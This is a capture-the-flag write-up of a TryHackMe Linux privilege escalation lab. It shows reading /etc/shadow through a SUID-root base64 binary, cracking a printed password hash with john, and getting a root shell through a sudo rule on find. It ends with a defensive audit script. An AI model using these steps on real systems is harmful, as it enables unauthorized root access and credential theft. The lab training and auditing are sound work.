THM Linux Privilege Escalation Capstone Write-up

Nov 18, 2024

Hello all! I wanted to put together a quick write-up on how to complete THM's Junior Pentester privilege escalation module, specifically the capstone challenge.

Getting Started

We are given a user and login info for the user Leonard.

  • Username: leonard

  • Password: Penny123

Once the machine starts, we can freely ssh into his account with

ssh leonard@[ip]

input his password, and you have a basic account.

Once inside…

With the base account we can only run commands at user level. We know this because when we run:

sudo -l

We are met with

[sudo] password for leonard: 
Sorry, user leonard may not run sudo on [ip]

So, that rules out a bunch of methods. However, there is something to note about the system we are operating on.

If we cat /etc/passwd, we see that there is a user named 'missy'. This will be important later.

missy:x:1001:1001::/home/missy:/bin/bash
// also confirmed if we run "ls /home"
$ ls /home
leonard  missy  rootflag

So what can we do to raise our privileges? Since Leonard can't run sudo, we should try and see if missy can. However, we aren't given missy's password— so we are gonna have to get creative and somehow access the /etc/shadow file.

Lateral movement

So to access missy's account, we need to somehow read /etc/shadow. Moving from one unprivileged user to another like this is called horizontal privilege escalation. Let's see if there are any SUID binaries on the system that will allow us to read sensitive files:

$ find / -type f -perm -4000 -ls 2>/dev/null
16779966   40 -rwsr-xr-x   1 root     root        37360 Aug 20  2019 /usr/bin/base64
17298702   60 -rwsr-xr-x   1 root     root        61320 Sep 30  2020 /usr/bin/ksu
17261777   32 -rwsr-xr-x   1 root     root        32096 Oct 30  2018 /usr/bin/fusermount
17512336   28 -rwsr-xr-x   1 root     root        27856 Apr  1  2020 /usr/bin/passwd
17698538   80 -rwsr-xr-x   1 root     root        78408 Aug  9  2019 /usr/bin/gpasswd
17698537   76 -rwsr-xr-x   1 root     root        73888 Aug  9  2019 /usr/bin/chage
17698541   44 -rwsr-xr-x   1 root     root        41936 Aug  9  2019 /usr/bin/newgrp
17702679  208 ---s--x---   1 root     stapusr    212080 Oct 13  2020 /usr/bin/staprun
17743302   24 -rws--x--x   1 root     root        23968 Sep 30  2020 /usr/bin/chfn
17743352   32 -rwsr-xr-x   1 root     root        32128 Sep 30  2020 /usr/bin/su
17743305   24 -rws--x--x   1 root     root        23880 Sep 30  2020 /usr/bin/chsh
17831141 2392 -rwsr-xr-x   1 root     root      2447304 Apr  1  2020 /usr/bin/Xorg
17743338   44 -rwsr-xr-x   1 root     root        44264 Sep 30  2020 /usr/bin/mount
17743356   32 -rwsr-xr-x   1 root     root        31984 Sep 30  2020 /usr/bin/umount
17812176   60 -rwsr-xr-x   1 root     root        57656 Aug  9  2019 /usr/bin/crontab
17787689   24 -rwsr-xr-x   1 root     root        23576 Apr  1  2020 /usr/bin/pkexec
18382172   52 -rwsr-xr-x   1 root     root        53048 Oct 30  2018 /usr/bin/at
20386935  144 ---s--x--x   1 root     root       147336 Sep 30  2020 /usr/bin/sudo
34469385   12 -rwsr-xr-x   1 root     root        11232 Apr  1  2020 /usr/sbin/pam_timestamp_check
34469387   36 -rwsr-xr-x   1 root     root        36272 Apr  1  2020 /usr/sbin/unix_chkpwd
36070283   12 -rwsr-xr-x   1 root     root        11296 Oct 13  2020 /usr/sbin/usernetctl
35710927   40 -rws--x--x   1 root     root        40328 Aug  9  2019 /usr/sbin/userhelper
38394204  116 -rwsr-xr-x   1 root     root       117432 Sep 30  2020 /usr/sbin/mount.nfs

Lo and behold, our lovely friend base64 is SUID root, meaning it runs with root's privileges no matter who invokes it.

If we do a quick search on gtfobins:

(base64) File read:

It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

LFILE=file_to_read
base64 "$LFILE" | base64 --decode

So back to our system:

base64 /etc/shadow | base64 -d
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

and like that, we got the password hash of missy.

Hash Cracker 2000

So now that we have missy's hash, we can use john to crack it. I personally default to using rockyou.txt for the most part, but in a real-world scenario, it is probably best to crack the hash via a rainbow table. But since we are just working with a lab, rockyou.txt will be sufficient to crack the password.

So, on our attacking machine, paste the hash into a file and run:

john --wordlist=path/to/rockyou.txt file_containing_missy_shadow_hash

Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (missy)
1g 0:00:00:00 DONE (2024-11-18 09:53) 2.564g/s 11815p/s 11815c/s 11815C/s adriano..Liverpool
Use the "--show" option to display all of the cracked passwords reliably
Session completed

and we see here that missy's password is "Password1", neat.

Cue the Hollywood line: "I'm in":

We got missy's password? Great, but that's not good enough. You see, missy is still just a regular user. She isn't root, but she is a step closer to root. The next section will explain how to obtain root from her login, but first let's collect the user flag from /home/missy/Documents/flag1.txt

cat Documents/flag1.txt
[thmflag goes here] //Nice try! Go do it yourself :)

Grand Finale! Ultra Power Move (Over 9k): getting root'd:

First, login as missy:

ssh missy@[ip]
Password for missy:
// once logged in

Last login: Mon Jun  7 21:19:11 2021
$

Oh good heavens... now that we have confirmed the horizontal escalation, can missy run any sudo commands?

$ sudo -l
Matching Defaults entries for missy on ip-10-10-71-233:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-71-233:
    (ALL) NOPASSWD: /usr/bin/find

OH LORD, MISSY CAN RUN find AS ROOT. This is the moment we have been waiting for— this is how we obtain root baby.
How? Well… let's ask our friend gtfobins:

(find) Shell:

It can be used to break out from restricted environments by spawning an interactive system shell.

find . -exec /bin/sh \;

SOOOOOOOOO… we can get a shell as root REALLY easily, all we have to do is:

// on the target machine
$ sudo find . -exec /bin/sh \; -quit

# whoami
root

aaaaaaaaaannnnndddddd like that the system is totally owned. Time to collect our flag and dip :)

# cd /home/rootflag
# ls
rootflag2.txt
# cat rootflag2.txt 
[thmflag2 is printed!] //Nice try! Go do it yourself :)

Conclusions:

So, to root this particular machine, you start from a user with no privileges, move to a user with some, and finally reach the ultimate goal of root. This lab helps users practice the following concepts:

  • Horizontal privilege escalation.

  • SUID binary abuse for read/write capabilities.

  • Cracking password hashes.

  • True vertical privilege escalation via exploiting misconfigured sudo settings.
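From the defender's side, the two misconfigurations this box is built on (a SUID-root base64 and a NOPASSWD sudo rule for find) are easy to spot if you audit for them. The script below is an added example, not part of the original write-up or of TryHackMe's lab; the SUID allowlist is an assumption about what a stock install normally ships and should be tuned per distro, and the sample input is constructed from the listing above.

```shell
#!/bin/sh
# Added audit example (not from the write-up). Flags SUID-root binaries that are
# not on an expected list, and sudo rules that need no password.

# Assumed allowlist of SUID-root binaries considered normal on this kind of host.
SUID_BASELINE="/usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/mount /usr/bin/umount
/usr/bin/chage /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chfn /usr/bin/chsh
/usr/bin/pkexec /usr/bin/crontab /usr/bin/at /usr/bin/fusermount /usr/sbin/unix_chkpwd"

# Reads `find / -type f -perm -4000 -ls` output on stdin and prints every
# root-owned SUID path that is not in the baseline (e.g. a setuid /usr/bin/base64).
audit_suid() {
    while read -r _inode _blocks mode _links owner _group _size _mon _day _year path; do
        case "$mode" in *s*) ;; *) continue ;; esac   # keep only setuid/setgid entries
        [ "$owner" = "root" ] || continue
        case " $SUID_BASELINE " in
            *" $path "*) ;;                            # expected, stay quiet
            *) printf 'UNEXPECTED SUID: %s (%s)\n' "$path" "$mode" ;;
        esac
    done
}

# Reads `sudo -l` output on stdin and prints every NOPASSWD rule. Any such rule
# granting a binary that can spawn a shell or read files (find, base64, ...) is root.
audit_sudo_nopasswd() {
    grep -E '^[[:space:]]*\(.*\)[[:space:]]+NOPASSWD:' | sed 's/^[[:space:]]*//'
}

# Constructed sample input, shaped like the listings in the write-up.
SAMPLE_FIND='16779966   40 -rwsr-xr-x   1 root     root        37360 Aug 20  2019 /usr/bin/base64
17512336   28 -rwsr-xr-x   1 root     root        27856 Apr  1  2020 /usr/bin/passwd
17743352   32 -rwsr-xr-x   1 root     root        32128 Sep 30  2020 /usr/bin/su'

SAMPLE_SUDO='User missy may run the following commands on ip-10-10-71-233:
    (ALL) NOPASSWD: /usr/bin/find'

# On a live host, replace the samples with:
#   find / -type f -perm -4000 -ls 2>/dev/null | audit_suid
#   sudo -l | audit_sudo_nopasswd
printf '%s\n' "$SAMPLE_FIND" | audit_suid
printf '%s\n' "$SAMPLE_SUDO" | audit_sudo_nopasswd
```

Remediation for both findings on this box is a one-liner each: `chmod u-s /usr/bin/base64` removes the bit, and the sudoers rule should be dropped or narrowed to a wrapper that cannot reach `-exec`.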

With that, I hope this write-up serves you well! Happy hacking!